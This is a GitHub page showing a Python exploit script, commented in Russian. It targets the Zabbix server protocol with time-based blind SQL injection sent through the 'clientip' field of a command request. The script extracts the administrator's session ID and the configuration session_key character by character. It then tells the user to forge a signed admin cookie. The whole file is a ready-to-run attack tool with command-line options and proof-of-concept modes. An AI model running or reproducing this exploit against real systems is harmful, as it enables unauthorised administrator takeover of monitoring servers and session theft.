-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathGenZSQLi_exploit.py
More file actions
160 lines (137 loc) · 9.36 KB
/
Copy pathGenZSQLi_exploit.py
File metadata and controls
160 lines (137 loc) · 9.36 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
import json
import asyncio
import aiohttp
import argparse
import struct
import string
from datetime import datetime
import logging
# Настройка логирования
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
logger = logging.getLogger()
# Параметры повторных попыток
MAX_RETRIES = 3
# Асинхронная функция для отправки сообщения
async def craft_and_send_message_async(target_ip, target_port, session_id, target_host_id, injection_payload):
zbx_protocol_header = "ZBXD\x01".encode()
message_body = {
"request": "command",
"sid": session_id,
"scriptid": "3",
"clientip": "' + " + injection_payload + "+ '",
"hostid": target_host_id
}
message_json = json.dumps(message_body)
message_length = struct.pack('<q', len(message_json))
full_message = zbx_protocol_header + message_length + message_json.encode()
# Асинхронное соединение и отправка данных
async with aiohttp.ClientSession() as session:
try:
async with session.post(f"http://{target_ip}:{target_port}", data=full_message) as response:
server_response = await response.read()
logger.info(f"Получен ответ: {server_response}")
except aiohttp.ClientError as e:
logger.error(f"Не удалось отправить сообщение: {e}")
# Обработка повторных попыток для отправки сообщения
async def safe_craft_and_send_message_async(target_ip, target_port, session_id, target_host_id, injection_payload):
for attempt in range(MAX_RETRIES):
try:
await craft_and_send_message_async(target_ip, target_port, session_id, target_host_id, injection_payload)
break
except Exception as e:
logger.error(f"Попытка {attempt + 1} не удалась: {e}")
if attempt == MAX_RETRIES - 1:
logger.critical("Достигнуто максимальное количество попыток, не удалось отправить сообщение.")
# Асинхронное извлечение session_id админа
async def retrieve_admin_session_id(ip_address, port_number, user_session_id, host_identifier, incorrect_sleep_time, correct_sleep_time):
admin_session_id = ""
max_token_length = 32
for char_index in range(1, max_token_length + 1):
for hex_char in string.digits + "abcdef":
logger.info(f"Пробуем символ {hex_char} на позиции {char_index}")
start_time = datetime.now().timestamp()
# Создаем запрос SQL-инъекции с использованием времени
sql_query = (
f"(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1),"
f"{char_index},1))={ord(hex_char)}) THEN sleep({correct_sleep_time}) ELSE sleep({incorrect_sleep_time}) END)"
)
await safe_craft_and_send_message_async(ip_address, port_number, user_session_id, host_identifier, sql_query)
end_time = datetime.now().timestamp()
# Проверка по времени выполнения, чтобы определить правильный символ
if correct_sleep_time > (end_time - start_time) > incorrect_sleep_time:
continue
else:
admin_session_id += hex_char
logger.info(f"Найден частичный session_id: {admin_session_id}")
break
return admin_session_id
# Асинхронное извлечение session_key из конфигурации
async def retrieve_configuration_session_key(ip_address, port_number, user_session_id, host_identifier, incorrect_sleep_time, correct_sleep_time):
config_token = ""
max_token_length = 32
for char_index in range(1, max_token_length + 1):
for hex_char in string.digits + "abcdef":
logger.info(f"Пробуем символ {hex_char} на позиции {char_index}")
start_time = datetime.now().timestamp()
# Создаем запрос SQL-инъекции с использованием времени
sql_query = (
f"(select CASE WHEN (ascii(substr((select session_key from config),"
f"{char_index},1))={ord(hex_char)}) THEN sleep({correct_sleep_time}) ELSE sleep({incorrect_sleep_time}) END)"
)
await safe_craft_and_send_message_async(ip_address, port_number, user_session_id, host_identifier, sql_query)
end_time = datetime.now().timestamp()
if correct_sleep_time > (end_time - start_time) > incorrect_sleep_time:
continue
else:
config_token += hex_char
logger.info(f"Найден частичный session_key: {config_token}")
break
return config_token
# Асинхронное выполнение простого PoC
async def execute_simple_poc(target_ip, target_port, user_session_id, target_host_id):
logger.info("Выполняем простой PoC...")
# Тестирование различных длительностей sleep и измерение времени ответа сервера
for sleep_duration in [1, 5, 10]:
logger.info(f"Тестируем длительность сна: {sleep_duration} сек.")
start_time = datetime.now().timestamp()
sleep_query = f"(select sleep({sleep_duration}))"
await safe_craft_and_send_message_async(target_ip, target_port, user_session_id, target_host_id, sleep_query)
end_time = datetime.now().timestamp()
logger.info(f"Время запроса: {end_time - start_time} секунд")
# Асинхронное создание SQL-запроса для проверки логов Zabbix
async def generate_zabbix_log_error(target_ip, target_port, user_session_id, target_host_id):
logger.info("Внедряем SQL-запрос для получения версии MySQL...")
version_query = "(version())"
await safe_craft_and_send_message_async(target_ip, target_port, user_session_id, target_host_id, version_query)
# Главная функция
async def main():
argument_parser = argparse.ArgumentParser(description='Командный интерфейс для эксплуатации SQL-инъекций в Zabbix')
argument_parser.add_argument("--false_time", help="Время ожидания для неверных предположений (по умолчанию=1)", default="1")
argument_parser.add_argument("--true_time", help="Время ожидания для верных предположений (по умолчанию=10)", default="10")
argument_parser.add_argument("--ip", help="IP-адрес Zabbix сервера")
argument_parser.add_argument("--port", help="Порт Zabbix сервера (по умолчанию=10051)", default="10051")
argument_parser.add_argument("--sid", help="ID сессии низкопривилегированного пользователя")
argument_parser.add_argument("--hostid", help="ID хоста, доступного пользователю с данным sid")
argument_parser.add_argument("--poc", action='store_true', help="Запустить простой PoC для проверки инъекции через sleep", default=False)
argument_parser.add_argument("--poc2", action='store_true', help="Создать ошибку в логах Zabbix для проверки вручную", default=False)
parsed_args = argument_parser.parse_args()
if parsed_args.poc:
await execute_simple_poc(parsed_args.ip, int(parsed_args.port), parsed_args.sid, parsed_args.hostid)
elif parsed_args.poc2:
await generate_zabbix_log_error(parsed_args.ip, int(parsed_args.port), parsed_args.sid, parsed_args.hostid)
else:
logger.info("Извлечение session_key конфигурации Zabbix...")
zabbix_session_key = await retrieve_configuration_session_key(
parsed_args.ip, int(parsed_args.port), parsed_args.sid, parsed_args.hostid,
int(parsed_args.false_time), int(parsed_args.true_time)
)
logger.info(f"Конфигурационный session_key={zabbix_session_key}")
logger.info("Извлечение session_id администратора...")
admin_session_id = await retrieve_admin_session_id(
parsed_args.ip, int(parsed_args.port), parsed_args.sid, parsed_args.hostid,
int(parsed_args.false_time), int(parsed_args.true_time)
)
logger.info(f"Session_id администратора={admin_session_id}")
logger.info(f"session_key={zabbix_session_key}, session_id администратора={admin_session_id}. Используйте эти значения для генерации cookie администратора Zabbix и подпишите его с помощью session_key.")
if __name__ == "__main__":
asyncio.run(main())